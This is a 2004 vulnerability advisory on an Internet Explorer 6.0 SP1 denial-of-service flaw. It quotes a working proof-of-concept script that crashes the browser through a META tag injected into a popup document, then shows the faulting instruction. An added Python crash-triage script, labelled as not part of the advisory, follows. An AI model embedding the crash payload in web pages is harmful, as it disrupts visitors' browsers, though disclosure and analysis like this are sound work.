Reported May 17, 2004, by Mike Mauler

VERSIONS AFFECTED

  • Microsoft Internet Explorer (IE) 6.0 Service Pack 1 (SP1)

DESCRIPTION
A vulnerability in IE 6.0 SP1 could result in a Denial of Service (DoS) condition. By using a malformed HTML page containing JavaScript code with a specially crafted META tag, a potential attacker could cause IE to terminate with an access violation.

DEMONSTRATION
The discoverer posted the following code as proof of concept:

The following script code will cause Internet Explorer to crash when trying to parse the META tag contained within. The problem stems from a bug in the MSHTML library (mshtml.dll). Below is the script code that causes the crash:

<script type="text/javascript">
        // IE-only API: createPopup() returns a popup window with its own document
        Wnd = window.createPopup();
        // Injecting the META tag into the popup's body triggers the crash in mshtml.dll
        Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar" content="no">';
</script>

The effect of the META tag is to cause an access violation within mshtml.dll, which is, however, not exploitable. The problematic piece of code is shown below:

636D54AF    8B48 2C         MOV     ECX, [EAX+2C]
EAX = 0, Bad read of address 0x0000002C
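As an added illustration of the triage in the excerpt above (not part of the advisory or the discoverer's post), the following Python script resolves the faulting memory operand from a disassembly line plus a register value and labels a near-null read the way the write-up does; the line layout and register dump are constructed to mirror the excerpt, not captured from a debugger.

```python
import re

# Constructed sample modelled on the advisory's crash excerpt; the disassembly
# line layout and the register value are assumptions, not a real debugger capture.
CRASH_LINE = "636D54AF    8B48 2C         MOV     ECX, [EAX+2C]"
REGISTERS = {"EAX": 0x0}

# Matches [base], [base+disp] or [base-disp]; displacement is hex, as in the advisory.
MEM_RE = re.compile(
    r"\[\s*(?P<base>E[A-D]X|E[SD]I|E[BS]P)\s*"
    r"(?:(?P<sign>[+-])\s*(?P<disp>[0-9A-Fa-f]+)h?)?\s*\]"
)


def parse_fault(line, regs):
    """Resolve the memory operand of a MOV-style line to (address, access).

    Only two-operand forms are handled: the memory operand is the destination
    (a write) when another operand follows it, otherwise it is the source.
    """
    mem = MEM_RE.search(line)
    if mem is None:
        raise ValueError("no memory operand found: %r" % line)
    base = regs[mem.group("base")]
    disp = int(mem.group("disp") or "0", 16)
    addr = base - disp if mem.group("sign") == "-" else base + disp
    addr &= 0xFFFFFFFF  # 32-bit x86 wrap-around
    access = "write" if re.match(r"\s*,", line[mem.end():]) else "read"
    return addr, access


def triage(addr, access):
    """Crude first-pass label for an access violation, as an analyst would apply it.

    An address in the first 64 KiB is almost always a NULL base plus a field
    offset (here EAX = 0 and the field at +0x2C): a crash-only DoS unless the
    base register is attacker-controlled. A write through a non-null pointer is
    the case that warrants a real exploitability analysis.
    """
    if addr < 0x10000:
        return "near-null %s at 0x%08X: NULL-pointer dereference, DoS only" % (access, addr)
    if access == "write":
        return "write to 0x%08X: check whether the pointer is controlled" % addr
    return "read from 0x%08X: non-null read, needs further analysis" % addr


if __name__ == "__main__":
    address, kind = parse_fault(CRASH_LINE, REGISTERS)
    print(triage(address, kind))  # near-null read at 0x0000002C: NULL-pointer dereference, DoS only
```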

VENDOR RESPONSE
Microsoft hasn't released a fix or bulletin that addresses this vulnerability.

CREDIT
Discovered by Mike Mauler.